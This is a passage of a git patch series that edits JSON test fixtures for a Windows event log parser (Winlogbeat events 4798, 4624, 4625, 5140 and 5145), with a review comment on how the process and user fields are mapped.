ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", 
+ "event": {
+ "action": "User Account Management",
+ "code": "4798",
+ "kind": "event",
+ "module": "security",
+ "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe",
+ "outcome": "success",
+ "provider": "Microsoft-Windows-Security-Auditing"
+ },
+ "@timestamp": "2024-11-12T08:25:34.741000Z",
+ "action": {
+ "id": 4798,
+ "outcome": "success",
+ "properties": {
+ "CallerProcessId": "0x123",
+ "CallerProcessName": "C:\\Program Files\\program.exe",
+ "SubjectDomainName": "DOMAIN",
+ "SubjectLogonId": "0x3e7",
+ "SubjectUserName": "ACC0123$",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetDomainName": "ACC0123",
+ "TargetSid": "S-3-4-5",
+ "TargetUserName": "Guest"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "name": "ACC0123",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "hostname",
+ "id": "12345678-90ef-abcd-1234-abcdef123456",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "mac": [
+ "00-11-22-33-44-55"
+ ],
+ "name": "hostname",
+ "os": {
+ "build": "20348.169",
+ "family": "windows",
+ "kernel": "10.0.20348.169 (WinBuild.160101.0800)",
+ "name": "Windows Server 2022 Standard",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "hostname"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ],
+ "user": [
+ "ACC0123"
+ ]
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "ACC0123",
+ "target": {
+ "domain": "ACC0123",
+ "name": "Guest"
+ }
+ },
+ "winlog": {
+ "activity_id": "{11111111-2222-3333-4444-555555555555}",
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "ACC0123.johndoe.com",
+ "event_id": "4798",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x3e7"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 668,
+ "thread": {
+ "id": 8860
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "1524672",
+ "task": "User Account Management"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json
index cde1d5c3c..8413484f9 100644
--- a/Beats/winlogbeat/tests/security_event_5140.json
+++ b/Beats/winlogbeat/tests/security_event_5140.json
@@ -93,11 +93,6 @@
 "api": "wineventlog",
 "channel": "Security",
 "computer_name": "HOST01.company.test",
- "event_data": {
- "AccessMaskDescription": [
- "Create Child"
- ]
- },
 "event_id": "5140",
 "keywords": [
 "Audit Success"
diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json
index 99a17d54f..ec1e78d54 100644
--- a/Beats/winlogbeat/tests/security_event_5145.json
+++ b/Beats/winlogbeat/tests/security_event_5145.json
@@ -96,13 +96,6 @@
 "api": "wineventlog",
 "channel": "Security",
 "computer_name": "host01.company.test",
- "event_data": {
- "AccessMaskDescription": [
- "List Object",
- "READ_CONTROL",
- "SYNCHRONIZE"
- ]
- },
 "event_id": "5145",
 "keywords": [
 "Audit Success"
From ce15f8192df09ce7a518c56479354e2ad1ffe28e Mon Sep 17 00:00:00 2001
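Review bot: The expected output for 4798 leaves `CallerProcessName` (`C:\Program Files\program.exe`) and `CallerProcessId` (`0x123`) only inside `action.properties` and asserts no ECS `process.*` fields, yet the calling process is the primary pivot for local-group enumeration, which is a common reconnaissance step; once the parser maps them this fixture should assert `process.executable`, `process.name` and `process.pid`. `related.user` also lists only the subject `ACC0123` and omits the enumerated target `Guest`, so a search on the target account will not return this event; the fixture should expect both names. The subject `ACC0123$` is a machine account whose trailing `$` is stripped to `ACC0123` in `user.name` and `related.user`, which is reasonable but is parser behaviour outside this hunk and worth a comment there.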
From: LenaigKaliou
Date: Thu, 14 Nov 2024 11:43:35 +0100
Subject: [PATCH 036/150] fixed linting issues
---
 Beats/winlogbeat/tests/security_event_4624.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4625.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4634.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4662.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4672.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4689.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4720.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4722.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4723.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4725.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4726.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4768.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4769.json | 4 ++--
 Beats/winlogbeat/tests/security_event_4798.json | 4 ++--
 14 files changed, 28 insertions(+), 28 deletions(-)
diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json
index 9e8cdfb26..fe8a200a5 100644
--- a/Beats/winlogbeat/tests/security_event_4624.json
+++ b/Beats/winlogbeat/tests/security_event_4624.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + } }, "expected": { "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json index ac5882d46..85bda7ac7 100644 --- a/Beats/winlogbeat/tests/security_event_4625.json +++ b/Beats/winlogbeat/tests/security_event_4625.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname
\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 